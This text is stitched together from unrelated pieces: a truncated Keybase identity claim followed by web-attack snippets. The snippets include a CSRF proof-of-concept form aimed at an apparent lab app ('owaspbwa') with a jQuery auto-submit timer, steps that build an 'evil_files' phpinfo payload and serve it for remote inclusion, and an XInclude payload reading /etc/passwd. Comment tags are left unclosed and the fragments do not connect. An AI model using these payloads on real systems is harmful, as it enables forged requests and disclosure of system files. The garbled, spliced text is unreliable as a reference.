I hereby claim:
- I am jakekarnes42 on github.
- I am jakekarnes (https://keybase.io/jakekarnes) on keybase.
- I have a public key ASCRTEY9DgdyMbIG7PHshYfpHvzbpTh_iv5IFqJtrGxZPQo
To claim this, I am signing this object:
<!--
PoC only. Useful for CSRF involving JSON values. Must actually click button to submit.
Submits a request that looks like the following:
POST /oneliner/ws/vulnerable/oneliners HTTP/1.1
Host: local.1-liner.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

<!-- Replace the iFrame source with victim URL-->
<html>
<style>
iframe {
width:1000px;
height:500px;
top:0; left:0;
border: 10px solid black;
}
</style>

<html>
<body>
<!-- Change URL and params below-->
<form method="POST" action="http://owaspbwa/ghost/blogView.php">
<input type="hidden" name="vuln" value="me so dumb"/>
<input type="hidden" name="user" value="admin"/>
<input type="submit" value="Submit">
</form>
</body>
</html>

<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function (){
setTimeout("$('#target').submit()", 3000);
});</script>
</head>
<body>
<h1>Loading...</h1>
<!-- Change URL and params below-->

<html>
<head></head>
<body>
<h1>Hello world!</h1>
</body>
</html>

<html>
<head>
<title>PHP Test</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>

$ mkdir evil_files
$ cat > evil_files/phpinfo.txt
<?php
phpinfo();
?>
Next, we need to serve the file. Python has a built-in web server module we can use for this.
$ cd evil_files
$ python -m SimpleHTTPServer

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>